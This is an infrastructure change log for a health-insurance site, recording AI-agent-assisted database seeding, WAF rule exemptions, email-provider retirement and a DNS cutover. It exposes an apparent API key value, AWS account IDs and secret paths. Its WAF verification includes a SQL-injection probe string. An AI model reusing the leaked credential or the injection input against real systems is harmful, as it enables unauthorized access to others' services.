MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/cleanup-legacy-fix-stale-zips.js --rollback

Re-inserts the 12 legacy entries in their original shape (countyFips + state + sbeRedirect from STATE_BASED_MARKETPLACES). Idempotent — won't double-insert. Safe to run if needed.

Net effect ​

  • Tier 1.5 SBE audit (#70) can now target 100% match across all 17,537 CMS-seeded SBE docs, no exemptions.
  • scripts/db/fix-stale-zips.js retains its 4 PO Box entries (unrelated to SBE redirects, unchanged). The 12 SBE-redirect entries in the file are now orphaned data; the file is left intact for git history but its SBE_REDIRECTS array is no longer the source of truth — superseded by seed-sbe-zips-from-cms.js + the CMS snapshot.

2026-05-01T01:22Z — SBE-state ZIP corrective seed: CMS as source of truth, per-county FIPS, cross-state border ZIPs supported ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #68. Supersedes: the 2026-04-30T17:30Z entry below (broken initial seed).

Why ​

The 2026-04-30T17:30Z seed shipped 13,027 SBE-redirect docs without countyFips, sourced from U.S. Census ZCTA. That violated the system's data-architecture principle: every (zip, countyFips) mapping must match CMS exactly so we can validate byte-for-byte against CMS today and any SBE marketplace later. Three concrete problems:

  1. New SBE docs had no county anchor — couldn't participate in tier-1.5-style audits.
  2. FIPS values, when written, came from Census not CMS — diverging from the canonical source.
  3. The 45 cross-state border ZIPs (NH+ME, DE+MD, VA+WV, NC/VA, TN/KY, MN/SD, etc.) were skipped entirely under the original Guard 2 — the SBE-side of those ZIPs had no coverage at all.

This corrective seed replaces those docs with CMS-authoritative per-county records that carry the FIPS anchor, and adds a per-county doc for every cross-state border ZIP's SBE side.

What shipped ​

Code (corrective ingest pipeline):

  • scripts/db/build-cms-snapshot.js (NEW) — one-shot script that queries CMS Marketplace API /counties/by/zip/{zip} for every ZIP in our SBE coverage universe (13,072 ZIPs from the existing Census-derived universe). 5-concurrent at ~23 req/sec, ~10 min runtime. Resume-capable via checkpoint file. 200 × HTTP 429 events auto-recovered via 5-second backoff.
  • scripts/db/data/sbe-zip-cms-snapshot.json (NEW, 1.2 MB committed) — per-ZIP CMS response: { zip: [{ countyFips, county, state }, ...], ... }. The operational source of truth; production traffic never re-queries CMS for these ZIPs.
  • scripts/db/seed-sbe-zips-from-cms.js (NEW, ~330 lines) — corrective ingest script. Three modes (--dry-run / --apply / --rollback). For each (zip, countyFips) from the snapshot, applies four-way classification: federal-exists (preserve), federal-gap (log), sbe-insert (new doc), sbe-refresh (idempotent), sbe-conflict (log). Marker tag _seedSource: "cms-2026-04-30" on every INSERT enables clean rollback.
  • scripts/db/seed-sbe-zips.js — minor --rollback defect fix (was a dry-run-only). Marked deprecated in header docstring.
  • scripts/db/data/sbe-zip-state-2020.csv — kept in repo as historical lineage; superseded by the CMS snapshot.

Code (route + hook for cross-state ZIPs):

  • src/app/api/counties/route.ts — short-circuit only when docs.every((d) => d.sbeRedirect) (truly fully-SBE ZIP). Otherwise return multi-county with per-county sbeRedirect annotation. Mirrors how healthcare.gov surfaces cross-state ZIPs (user picks the county they actually live in).
  • src/lib/types.ts — County.sbeRedirect? added as optional field.
  • src/lib/hooks/use-calculator.ts — post-county-pick: if selected county carries sbeRedirect, set phase=state_marketplace instead of proceeding to /api/eligibility. PostHog event tagged source: "per_county_pick".

Docs:

  • docs/infrastructure/data-sources.md — CMS Marketplace API replaces Census ZCTA as canonical SBE-ZIP source. Original Census source marked SUPERSEDED.
  • This change-log entry (the original 17:30Z entry below stays intact as historical record).

Apply results (identical on staging + prod) ​

StepOperationCount
Rollback (broken seed)seed-sbe-zips.js --rollback removed 13,015 docs (sbeRedirect + no countyFips)13,015
Apply (corrective)seed-sbe-zips-from-cms.js --apply inserted CMS-sourced per-county docs17,537
Federal/NY preservedGuard 1 left existing federal-30 + NY county docs untouched30,326 (unchanged)
Fix-stale-zips style12 entries from fix-stale-zips.js left untouched12 (unchanged)
Total docs after corrective seed—47,875

Math identity: 30,326 + 12 + 17,537 = 47,875 ✓ on both clusters.

Why 17,537 > original 13,015: CMS returns multi-county for many SBE-state ZIPs (3,510 ZIPs are multi-county per the snapshot), and cross-state border ZIPs now correctly get separate docs per CMS-returned county.

Federal data gaps surfaced (logged for follow-up — federal data has its own PUF-driven ingest pipeline; auto-insert deliberately not done here):

  • zip=30555 → CMS reports TN/47139 Polk County (we don't have)
  • zip=30559 → CMS reports NC/37039 Cherokee County (we don't have)
  • zip=88240 → CMS reports TX/48165 Gaines County (we don't have)

CMS data gaps: 4 ZIPs returned 0 counties from CMS (same family as 02101 from the temp-fix's edge case). Continue to fall through to the existing CMS API fallback in route.ts (defense-in-depth).

Verification ​

Probe matrix on https://askflorence.health/api/counties (post route+hook deploy):

SBE-only ZIPs (single SBE state, single redirect):

  • 90001 (CA), 02115 (MA), 06103 (CT), 80202 (CO), 21201 (MD), 02903 (RI), 89101 (NV), 87501 (NM), 19103 (PA), 98101 (WA), 20001 (DC), 05601 (VT), 04101 (ME), 60601 (IL) → all { sbeRedirect: ... } HTTP 200 from MongoDB

Cross-state border ZIPs (NEW — multi-county with per-county SBE):

  • 03579 (NH+ME) → { counties: [{NH/Coos, no sbeRedirect}, {ME/Oxford County, sbeRedirect: ME}] } ← user picks
  • 19973 (DE+MD) → { counties: [{DE/Sussex, no sbeRedirect}, {MD/Dorchester County, sbeRedirect: MD}] }
  • (similar pattern for 24604, 30165, etc.)

Federal/NY happy paths (unchanged):

  • 84094 (UT), 10282 (NY), 19701 (DE), 75001 (TX) → counties payload from MongoDB unchanged

Compliance posture ​

FrameworkControlPosture
HIPAA§164.312(c) IntegrityThree-guard safety + Atlas audit log proves no mutation of verified federal/NY data
HIPAA§164.312(b) Audit controlsAll writes recorded in Atlas audit log; CloudTrail on Secrets Manager fetches
SOC 2 TSCCC6.1 / CC7.1 / CC8.1Idempotent script + dry-run gate + reviewed apply + dated change-log entry + IaC
NIST 800-53 R4 (MARS-E 2.2)CM-3 / SI-7Reproducible CMS snapshot + tier-1.5-ready data + corrective change documented
EDE Phase 3Data provenanceSource URL committed in script; CMS-canonical FIPS enables byte-for-byte audit comparability with CMS

Net effect ​

  • Pre-correction (broken seed): SBE redirect docs had no FIPS — couldn't be audited against CMS. Cross-state border ZIPs served only the federal portion. Architectural promise (byte-for-byte CMS parity) violated.
  • Post-correction: every SBE doc carries CMS-canonical (zip, countyFips, county, state). Cross-state border ZIPs return multi-county responses; user picks the county they live in (federal → plan flow, SBE → marketplace redirect). Tier-1.5 SBE audit becomes possible.

Rollback ​

bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/seed-sbe-zips-from-cms.js --rollback

Deletes only docs with _seedSource: "cms-2026-04-30". Federal/NY data + fix-stale-zips entries protected by construction.

Annual refresh playbook ​

Embedded in scripts/db/seed-sbe-zips-from-cms.js header docstring + summarized in data-sources.md. At plan-year transition: re-run build-cms-snapshot.js → review STATE_BASED_MARKETPLACES → dry-run → staging apply + verify → prod apply + verify → tier audits → change-log entry.


2026-04-30T17:30Z — SBE-state ZIP MongoDB-first ingest (retires CMS fallback dependence) ​

⚠ SUPERSEDED 2026-05-01T01:22Z: this seed shipped without countyFips and used Census instead of CMS as the source. See entry above for the corrective seed that replaced it. This entry preserved as historical record.

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211 via Atlas user app_writer_plans + prod app-write from Secrets Manager); agent: Claude Opus 4.7 Linked: Issue #68 (proper data-side fix). Follow-up to commit 1e5258a (CMS API fallback temp fix, 2026-04-30T07:55Z, comment on #47).

Why ​

The temp fix that landed earlier today routed every SBE-state ZIP request through a CMS Marketplace API call to learn the state. That worked but introduced an external dependency on the consumer hot path, ~250ms first-hit latency, and a CMS-API-outage failure mode. The intended long-term architecture (established by Issue #49 / commit 330871e for federal-30 + NY plans) is MongoDB-first for every U.S. ZIP. This change seeds every SBE-state ZIP into MongoDB with redirect-only docs so /api/counties returns sbeRedirect from owned data without external API calls.

What shipped ​

Code changes:

  • src/lib/constants.ts — added IL: "Get Covered Illinois (getcovered.illinois.gov)" to STATE_BASED_MARKETPLACES. IL launched its SBE in 2025 plan year; prior to this change IL was a real coverage gap (SBE_STATES included IL but the marketplace map didn't, so IL ZIPs returned 404 with no redirect banner).
  • scripts/db/seed-sbe-zips.js — new ingest script. Three modes: --dry-run (default), --apply, --rollback. Optional --verify-cms-sample runs 200-ZIP CMS cross-check at 1 req/sec for source-quality validation. ~430 lines including embedded refresh playbook in header docstring.
  • scripts/db/data/sbe-zip-state-2020.csv — committed snapshot of SBE-state ZIPs from U.S. Census 2020 ZCTA-to-County relationship file. 13,084 rows (zip,state,county_fips_sample). Reproducible, airgap-safe.
  • docs/infrastructure/data-sources.md — new doc covering the data ingestion pipeline lineage, refresh cadence, conflict log archive (45 border-ZIPs not auto-redirected), provenance + audit trail.
  • docs/.vitepress/config.ts — sidebar entry for the new doc.

Data writes (idempotent, three-guard safety):

Mongo clusterOperationsResult
Staging Atlas (project askflorence-staging, M0)13,027 inserts + 12 unchanged + 45 skipped (CONFLICT)Total docs 30,338 → 43,353
Prod Atlas (project AskFlorence, M10 HIPAA, cluster askflorence-prod-01)13,027 inserts + 12 unchanged + 45 skipped (CONFLICT)Total docs 30,338 → 43,353

Math checks identically on both: 30,326 (clean federal/NY, untouched) + 12 (existing fix-stale-zips, untouched) + 13,015 (new redirect-only) = 43,353. Zero federal-30 or NY county docs were mutated — Guard 2 worked.

The 45 CONFLICT skips are all real border ZIPs spanning SBE + federal counties (ME/NH, DE/MD, VA/WV, NC/VA, MN/SD, etc.). Catalogued in data-sources.md as future per-county-redirect scope. Existing federal data continues to serve them correctly.

How ​

  1. Recon against prod read replica via app-read: confirmed 31 states with plans (federal-30 + NY) and 30,338 zip_county docs.
  2. Source data prep: downloaded Census ZCTA-County file, derived state from county FIPS prefix, filtered to SBE-state ZIPs, committed snapshot CSV.
  3. Staging Atlas access: temporarily added laptop IP to staging Atlas allowlist (project askflorence-staging); used app_writer_plans user from staging Secrets Manager (staging/mongodb/plans-write) for the apply.
  4. Staging dry-run + apply: 13,027 inserts (verified all 19 SBE states + DC + IL).
  5. Staging smoke: 19-probe matrix on stage.askflorence.health/api/counties. All SBE states + IL → sbeRedirect 200 from MongoDB; federal/NY paths unchanged.
  6. Prod apply: same script run with prod app-write URI from Secrets Manager (prod/mongodb/app-write). Identical results.
  7. Prod smoke: 19-probe matrix on askflorence.health/api/counties. All match.
  8. Cleanup: removed temp laptop IP from staging Atlas allowlist.

Verification ​

Probe matrix on https://askflorence.health/api/counties (all returned HTTP 200 with the documented sbeRedirect payload from MongoDB):

ZIPStateMarketplace
90001CACovered California
02115MAMassachusetts Health Connector
06103CTAccess Health CT
80202COConnect for Health Colorado
21201MDMaryland Health Connection
02903RIHealthSource RI
89101NVNevada Health Link
87501NMbeWellnm
19103PAPennie
98101WAWashington Healthplanfinder
20001DCDC Health Link
05601VTVermont Health Connect
04101MECoverME.gov
60601ILGet Covered Illinois
84094 (UT, federal)—counties payload from MongoDB ✓ unchanged
10282 (NY, owned)—counties payload ✓ unchanged
19701 (DE, federal)—counties payload ✓ unchanged
75001 (TX, federal)—counties payload ✓ unchanged
00000 (invalid)—404 ✓ unchanged

Compliance posture ​

FrameworkControlPosture
HIPAA§164.312(c) IntegrityTier audits + Atlas audit log + script's three guards prove no mutation of verified data
HIPAA§164.312(b) Audit controlsAtlas audit log records every write op; CloudTrail records every Secrets Manager fetch
SOC 2 TSCCC6.1 / CC7.1 / CC8.1Idempotent script + dry-run gate + reviewed apply + dated change-log entry
NIST 800-53 R4 (MARS-E 2.2)CM-3 / SI-7Three-guard safety + reproducible snapshot + tier audit verification
EDE Phase 3Data provenanceSource URL committed in script header; CSV snapshot committed for audit reproducibility

Net effect on the consumer hot path ​

  • Pre-change: /api/counties?zip=<SBE-zip> → MongoDB miss → CMS Marketplace API call → response (~250ms first-hit, cached after)
  • Post-change: /api/counties?zip=<SBE-zip> → MongoDB hit → response (~5ms, federal-NY parity)

The CMS fallback in src/app/api/counties/route.ts is kept as defense-in-depth (per the original plan), now dormant for steady-state traffic. The in-memory cmsFallbackCache should stay near-empty over time — that's the verifiable signal that ingest succeeded. Decision to keep-or-retire the fallback: deferred 1 week post-deploy.

Rollback ​

bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/seed-sbe-zips.js --rollback

Rollback only removes redirect-only docs (sbeRedirect with no countyFips) — fix-stale-zips entries (countyFips + sbeRedirect both set) are protected and stay intact.

Notes for next refresh ​

  • Census ZCTA refresh cadence: the Census 2020 ZCTA file refreshes ~annually around June. New 2030 boundaries will land circa 2031-2032.
  • Annual at plan-year transition: re-run the script + smoke matrix. Refresh playbook embedded in scripts/db/seed-sbe-zips.js header docstring; mirror in data-sources.md.
  • STATE_BASED_MARKETPLACES drift: cross-check against CMS's Marketplace operating-status page during plan-year transitions. States may transition to/from SBE.
  • Per-county SBE redirect for border ZIPs is a future enhancement tracked on Issue #68 (would change /api/counties response shape + frontend consumer). Not in scope for the seed ingest.

2026-04-30T17:19Z — Phase 11 hardening: Resend retirement (Secrets Manager + IAM + ECS task def) ​

Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #47, Issue #57 (vendor BAA register).

Why ​

Apex (askflorence.health) has been on AWS SES exclusively since the Phase 10 cutover (2026-04-23T01:45Z entry above). Vercel-side Resend has been broken since 2026-04-10 (literal \n in API key + Resend domain in failed status, no DKIM CNAMEs). Decision per the Phase 10 entry: retire rather than revive. SES out of sandbox + verified working end-to-end (4 form-flow probes + 2 direct CLI sends, 0 bounces / 0 complaints / 0 rejects).

What shipped ​

Code (working tree, awaiting commit + CI deploy):

  • src/lib/email.ts — Resend code path stripped; module collapsed to SES-only. ~80 lines deleted.
  • src/app/api/waitlist/route.ts — addToAudience(), RESEND_API_BASE, AUDIENCE_ID, the RESEND_API_KEY not configured 500-gate, the audience-sync block, and resend_ok/resend from response + PostHog all removed. ~50 lines deleted.
  • src/app/api/agents/discovery/route.ts — canSendEmail guard removed; getEmailProvider import dropped.
  • src/app/_home/components/TargetPage.tsx — wired the home Get early access button to POST /api/waitlist (was a no-op since the v0.29.0 home swap; latent bug surfaced + fixed in same session).
  • TS + lint clean.

Infra (applied, this entry's timestamp):

  • infra/envs/prod/ecs.tf — removed RESEND_API_KEY = module.secrets.secret_arns["resend-api-key"] from the secret-injected env vars block.
  • infra/envs/prod/secrets.tf — removed "resend-api-key" entry from the secrets-spec for-each map.
  • terraform plan: 0 to add, 1 to change, 2 to destroy — IAM SecretsRead policy update + Secrets Manager secret destroy + secret-version destroy.
  • ECS task definition rolled FIRST (before terraform apply) because lifecycle { ignore_changes = [container_definitions] } in the ecs-service module means env-var bindings on running tasks aren't tracked by Terraform: pulled :20 task def → filtered out the RESEND_API_KEY secret entry → aws ecs register-task-definition → service updated to :21 → watched rollover stabilize (PRIMARY :21 fully running, ACTIVE :20 drained to 0). THEN terraform apply.
  • Why this order: doing it in reverse would have destroyed the secret + revoked IAM access while running tasks still referenced RESEND_API_KEY in their task def, breaking new task startups (autoscale, restart, deploy).

Verification ​

  • aws sesv2 get-account — ProductionAccessEnabled: true, SendingEnabled: true, EnforcementStatus: HEALTHY.
  • 6 form-flow probes on apex (4 pre-retirement + 2 post-retirement) — all 200 with Mongo writes succeeding; SES per-minute Send metric ticked correctly.
  • 2 direct aws sesv2 send-email CLI tests — both delivered with valid MessageIds.
  • AWS/SES/Send: 12 sends in window, 0 bounces, 0 complaints, 0 rejects.
  • Apex /api/health 200 throughout rollover + apply.
  • aws secretsmanager describe-secret --secret-id prod/resend-api-key → DeletedDate: 2026-04-30T17:19:12-06:00 (default 30-day recovery window, restorable if needed).
  • aws iam get-role-policy askflorence-prod-app-task-execution SecretsRead → resend-api-key ARN no longer in Resource list.

Compliance impact ​

FrameworkControlPosture
HIPAA§164.308(a)(1)(ii)(B) Risk managementOne vendor removed from integration boundary; smaller PHI footprint
HIPAA§164.314(a) BAA scopeResend BAA chase eliminated (was pending under #57); SES covered under existing AWS Organizations BAA
SOC 2 TSCCC6.6 / CC8.1Terraform IaC + this dated entry + CloudTrail in log-archive = audit evidence
EDE Phase 3MARS-E 2.2 inheritanceNo change to inheritance posture

Rollback ​

Within 30 days: aws secretsmanager restore-secret --secret-id prod/resend-api-key + revert the Terraform commit + terraform apply. Then re-create a Resend account + populate the secret value. The code-side rollback is git revert of the Resend-retirement commit.

After 30 days: secret is permanently destroyed; full re-create from scratch (new Resend account, new API key, new domain DKIM verification). Code-side rollback unchanged.

Practical answer: if there's any reason to revive Resend, do it before 2026-05-30T17:19Z.

Vercel — intentionally not touched ​

Per user direction ("leave it as is, I'll stop using it instead"), Vercel project's RESEND_API_KEY env var stays. Vercel-side emails have been broken for 3+ weeks anyway (key + domain both invalid since 2026-04-10). Vercel will be deprecated separately.


2026-04-30T09:00Z — WAF scoped exemptions: PostHog /ingest/* + social-crawler User-Agent allowlist ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #47 Phase 11 hardening — comments at 2026-04-30T08:05Z (PostHog block) and Telegram-bot finding flagged in-session.

Why ​

Two managed-rule false-positive families surfaced post Phase 10 cutover, both expected when moving from Vercel default protections onto a real WAF on production traffic:

  1. PostHog analytics returning zero events. Browser console showed POST /ingest/e/ and /ingest/s/ returning HTTP 403 from WAF. PostHog dashboard receiving no events from apex traffic. Cause: AWSManagedRulesCommonRuleSet and AWSManagedRulesSQLiRuleSet pattern-match PostHog's gzip-compressed event payloads as suspicious bodies. The path is a first-party Next.js rewrite — no SQL or user input surface there.

  2. Social-media link previews broken on Telegram (149.154.0.0/16 hits AWSManagedRulesAmazonIpReputationList), and the same family of false-positives expected to affect Facebook, LinkedIn, Slack, Discord, Twitter, WhatsApp, Apple iMessage, Reddit, Skype/Teams. Cloud datacenter CIDRs flagged wholesale by commercial threat-intel feeds. Direct funnel risk for consumer + agent acquisition flows that depend on shareable links.

What shipped ​

Single Terraform module change, applied to both environments:

  • infra/modules/cloudfront-waf/main.tf — added scope_down_statement blocks to four managed_rule_group_statement rules:
    • Priority 0 AWSManagedRulesCommonRuleSet — exempt URI STARTS_WITH /ingest/
    • Priority 20 AWSManagedRulesSQLiRuleSet — exempt URI STARTS_WITH /ingest/
    • Priority 30 AWSManagedRulesAmazonIpReputationList — exempt User-Agent CONTAINS (lowercase) any allowlisted crawler substring
    • Priority 40 AWSManagedRulesAnonymousIpList — same UA allowlist exemption
  • infra/modules/cloudfront-waf/variables.tf — new posthog_proxy_uri_prefix (default "/ingest/") and social_crawler_user_agents (default 11-entry list: telegrambot, facebookexternalhit, facebookcatalog, linkedinbot, slackbot, discordbot, twitterbot, whatsapp, skypeuripreview, redditbot, applebot). Variable validation enforces ≥2 entries on the UA list (WAFv2 or_statement requirement).
  • docs/infrastructure/cloudfront-waf-setup.md — new doc with full rule stack, scoped-exemption rationale, compliance mapping (HIPAA / SOC 2 / NIST 800-53 R4 / EDE Phase 3), residual-coverage proof, verification curls, operational runbook.
  • docs/.vitepress/config.ts — new sidebar entry under Infrastructure for "CloudFront + WAFv2".

Rules NOT changed (defense-in-depth preserved):

  • AWSManagedRulesKnownBadInputsRuleSet (priority 10) — runs on every request including /ingest/* and crawler UAs.
  • RateBasedBlanket 2000 req/5min/IP (priority 100) — applies universally.
  • All other rule groups remain in BLOCK mode (override none {} left intact).
  • WAF logging unchanged: every request still recorded to the CloudWatch log group with action, terminatingRuleId, ruleGroupList for forensics.

How ​

Module + env apply pattern, staging-then-prod:

  1. terraform fmt -recursive modules/cloudfront-waf/ + terraform validate in infra/envs/staging/ → green.
  2. terraform plan -target=module.cloudfront_staging → 0 to add, 1 to change, 0 to destroy (web ACL modified in place with all 4 scope-downs).
  3. terraform apply -target=module.cloudfront_staging -auto-approve → applied; web ACL 4d7e1072-04b4-466b-b67a-5ce03036757d.
  4. Staging verified with 7-probe curl matrix (PostHog 400, SQLi-on-counties 403, normal-traffic 200, crawler UAs 200) — all expected results.
  5. terraform plan -target=module.cloudfront_prod → same shape (1 to change).
  6. terraform apply -target=module.cloudfront_prod -auto-approve → applied to web ACL e05c650b-4dec-456a-af42-3ec0a7c3dcdc.
  7. Prod verified with 10-probe curl matrix (PostHog /ingest/e/ and /ingest/s/ both 400 from PostHog NOT 403 from WAF; SQLi-on-counties 403; home/api 200; TelegramBot/facebookexternalhit/LinkedInBot/Slackbot UAs all 200; /api/health env=prod).

CloudTrail in log-archive captures wafv2:UpdateWebACL events for both apply runs (machine-readable change record per SOC 2 CC8.1 + EDE Phase 3 CM-3).

Compliance impact ​

The audit story strengthens with this change. Auditor walkthrough:

FrameworkControlPosture
HIPAA§164.308(a)(1)(ii)(B) Risk managementDocumented risk-based decision with compensating controls
HIPAA§164.312(b) Audit controlsAll requests still logged to CloudWatch; WAF action field shows whether scope-down fired
SOC 2 TSCCC6.1 / CC6.6 boundary protectionAll rules remain BLOCK; exemptions are payload/identity-scoped not blanket allows
SOC 2 TSCCC8.1 change managementTerraform IaC + reviewed change + this dated change-log = textbook evidence
NIST 800-53 R4 (MARS-E 2.2)SC-7 boundary, SI-4 monitoring, AU-2/AU-3 auditAll preserved with ≥4 enforcement layers per request
EDE Phase 3MARS-E 2.2 inheritanceBoth exemptions apply only to public-data paths (no PHI / PII / FTI / application / cms_hub data class today)

Forward-compatibility checkpoints documented in cloudfront-waf-setup.md → "When to re-evaluate": Phase 5 cutover (agent portal/member dashboard ship), EDE Phase 3 audit prep (~Sept 2026), PostHog vendor decision (Phase 11).

Rollback ​

If a scope-down causes unforeseen behavior:

bash
# Disable PostHog exemption only:
# Set posthog_proxy_uri_prefix = "" in module call (or remove the override).
# Apply. Common + SQLi resume inspection of /ingest/*.

# Disable crawler UA exemption only:
# Set social_crawler_user_agents = [] in module call.
# Apply. IpReputation + AnonymousIp resume inspection of all UAs.

# Full revert: revert the commit. terraform apply restores prior rule structure.

WAF state propagation is fast (under 60 seconds on managed rule changes); rollback is a single terraform apply away.


2026-04-24T01:45Z — Phase 10 DNS cutover + follow-up fixes (S3 uploads, email provider, Vercel write bug) ​

Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211 + mgmt 778477254880) + Cloudflare dashboard; agent: Claude Opus 4.7 Linked: Issue #47 Phase 10.

Why ​

Phase 8 built the prod AWS stack and served it on prod-canary.askflorence.health. Phase 9 validated end-to-end parity vs Vercel across 60/60 HTTP probes. Phase 10 moves the production apex DNS so real users hit the AWS stack. Along the way, three latent bugs surfaced and got fixed properly.

What shipped ​

DNS cutover (Cloudflare zone askflorence.health):

  • askflorence.health apex: A 216.198.79.1 (Proxied) → CNAME d1pnfyzua893hx.cloudfront.net (DNS only), TTL 300s
  • www.askflorence.health: CNAME askflorence.health (Proxied) → CNAME d1pnfyzua893hx.cloudfront.net (DNS only), TTL 300s
  • Vercel proxy path retired from DNS. Vercel deployment kept running as rollback target for 48h.

Follow-up fix 1 — Vercel pre-existing write bug. Audit discovered MONGODB_WRITE_URI="" on Vercel prod env (empty string, ~2 weeks stale). Consumer + agent waitlist + survey writes on Vercel had been silently failing with "MONGODB_URI_WAITLIST_WRITE or MONGODB_URI_SURVEY_WRITE or MONGODB_WRITE_URI must be set" that entire window. Rotated the app-write password on prod Atlas via atlas dbusers update, populated prod/mongodb/app-write in Secrets Manager, pushed the same URI to Vercel env, re-deployed Vercel. Writes resume on Vercel (which stays warm as the Phase 10 rollback).

Follow-up fix 2 — Prod SES in sandbox + Resend key bug. Post-cutover smoke surfaced email failures:

  • SES in sandbox mode: only taha@askflorence.health verified. agents@askflorence.health ops-notifications silently failing.
  • Attempted Resend fallback via EMAIL_PROVIDER=resend to route through Resend while SES waited for prod-access approval.
  • Resend failed: API key is invalid. Traced to the exact same literal-\n bug class as the CMS_API_KEY had — Vercel stored re_HDRhaUUw_6WV5EDvoRj1huQNRazQiNqki\n (backslash-n literal at end). Cleaned the key, re-tested — Resend now returns updates.askflorence.health domain is not verified (domain status "failed" on the Resend account since 2026-04-10; no Resend DKIM records were ever published to Cloudflare). Vercel email sending has therefore also been broken for ~2 weeks, compounding with the empty MONGODB_WRITE_URI bug above.
  • Decision: flip EMAIL_PROVIDER back to ses on prod, file AWS SES production-access request with conservative volume framing (under 100/day current, under 500/day ceiling 60d, under 5k/day through end of 2026). updates.askflorence.health is properly verified on the prod SES account (DKIM + MAIL FROM + DMARC, all SUCCESS per Phase 8). Resend retires per the original Phase 11 plan rather than being revived.

Follow-up fix 3 — Agent file upload path dead on AWS prod. Smoke test of /api/agents/discovery/upload surfaced missing IAM + env vars. Proper Terraform fix landed:

  • New infra/envs/management/s3-askflorence-data.tf — manages the bucket policy on askflorence-data (mgmt account, 778477254880). Preserves existing DenyNonSSLRequests statement and adds AllowProdEcsTaskRolePutAgentSurveyUploads statement granting arn:aws:iam::039624954211:role/askflorence-prod-app-task s3:PutObject on arn:aws:s3:::askflorence-data/agent-survey-uploads/*. Does NOT take ownership of the bucket resource itself (bucket predates Terraform).
  • infra/envs/prod/ecs.tf — task role gains inline policy S3AgentSurveyUploadsWrite granting s3:PutObject on the same prefix; task def env var S3_AGENT_SURVEY_BUCKET=askflorence-data.
  • No KMS grants needed: mgmt CMK alias/askflorence-data key policy already permits any org principal to GenerateDataKey/Decrypt/DescribeKey via s3.us-east-1.amazonaws.com (legacy Tfstate-era statement, ViaService-bound).
  • GuardDuty Malware Protection for S3 (enabled Phase 2.5) continues scanning all new uploads under agent-survey-uploads/ regardless of writer. Scan-tag on successful upload.
  • Verified end-to-end: POST /api/agents/discovery/upload with a real PDF returned HTTP 200 and wrote to agent-survey-uploads/custom/1776993996441-.../consent-template.pdf via cross-account role-based auth.

Operational hygiene:

  • Prod task def revision :7 registered with the S3 bucket env + EMAIL_PROVIDER=ses. Service rolled over cleanly; 2 HA tasks stay healthy.
  • Prod ECS smoke endpoint in the workflow switched from prod-canary.askflorence.health (CloudFront + WAF — WAF false-positives the GitHub Actions runner IP) to origin.askflorence.health (direct ALB via the wildcard SAN CNAME). Three prior CI runs failed on the WAF block; once switched, runs go green.
  • Prod ECR configured for immutable tags. CI workflow shifted from inline buildx cache (embeds cache into the image tag, incompatible with immutable-tag rewrites) to GitHub Actions type=gha cache backend. No :latest pushed on prod — task defs pin to :<sha> only.

How ​

Four applies this session:

  1. terraform apply in infra/envs/management/ — adopted askflorence-data bucket policy as Terraform-managed (1 resource).
  2. terraform apply in infra/envs/prod/ — added S3AgentSurveyUploadsWrite inline policy to task role (1 resource).
  3. aws ecs register-task-definition out-of-band — new revision :7 with S3_AGENT_SURVEY_BUCKET env + EMAIL_PROVIDER=ses (per the ecs-service module's ignore_changes = [container_definitions] design, TF doesn't push env changes directly).
  4. aws ecs update-service — rollover to task def :7. Service stable on new revision.

Cloudflare DNS cutover done via dashboard: both records edited, proxy turned OFF, TTL to 300s. Global DNS propagation < 1 min. First CloudFront edge log hit came in at SEA900-P10 within 15 seconds of save.

Rollback ​

  • DNS rollback (< 5 min): revert Cloudflare records — apex back to A 216.198.79.1 Proxied, www back to CNAME askflorence.health Proxied. Vercel deployment was not touched; serves seamlessly. Atlas allowlist still contains 0.0.0.0/0 so Vercel can still reach prod cluster.
  • S3 upload rollback: terraform destroy the aws_s3_bucket_policy.askflorence_data and aws_iam_role_policy.task_inline["S3AgentSurveyUploadsWrite"]. Bucket policy reverts to the pre-Terraform state (just DenyNonSSLRequests). Task role loses upload permission; endpoint returns the original "bucket not configured" error. No user data lost — bucket contents untouched.
  • Email provider rollback: flip EMAIL_PROVIDER task def env back to resend + re-register + update-service. Caveat: Resend account + domain are both in a broken state, so this is not actually a viable rollback today.

Verification ​

All from operator laptop through public internet, https://askflorence.health:

  • GET /api/health → 200 with "env":"prod" and commit SHA matching deployed image.
  • GET / + /plans + /agents + /agent-onboarding + /agent-discovery + /updates + /privacy + /terms → 200.
  • GET /api/counties?state={TX,NY}&zip=... → 200 identical JSON to Vercel.
  • POST /api/eligibility with correct nested {household,place,year} shape → 200 with APTC + CSR tier (matched Vercel).
  • POST /api/plans with same shape → 200 with 100 plans returned (matched Vercel).
  • POST /api/waitlist consumer + agent interest variants → 200 with real Mongo _id (write via peering).
  • POST /api/agents/discovery/upload with valid PDF + docType=custom + blankConfirmed=true → 200 with S3 object key. Object present in askflorence-data/agent-survey-uploads/.
  • GET /?id=1' OR '1'='1 → 403 via WAF SQLi rule.
  • Response headers: server: AskFlorence, CloudFront POP header, HSTS + CSP + X-Frame-Options DENY. No trace of Cloudflare proxy or Vercel in headers.
  • ECS service: desired 2, running 2, rollout COMPLETED, task def :7. Zero 5xx in last 10 min. 86+ real-user requests recorded on the ALB.
  • Phase 9 HTTP parity probe (pre-cutover gate): 60/60 across 20 stratified scenarios × 3 endpoints. 100%.

What this phase does NOT do ​

  • Does not retire Vercel. Vercel keeps running as rollback target for 48h. Archive at T+48h if clean.
  • Does not remove 0.0.0.0/0 from prod Atlas IP access list. Vercel path stays until archive. Post-48h task.
  • Does not retire Resend API key. Account-level retirement is a Phase 11 task.
  • Does not grant SES prod access. Separate AWS support ticket filed with the conservative framing; typical turnaround 24-72h.
  • Does not provision narrow-scoped prod Atlas writers. #56 prod follow-up session.

2026-04-23T02:00Z — Phase 8 prod AWS mirror live (canary) ​

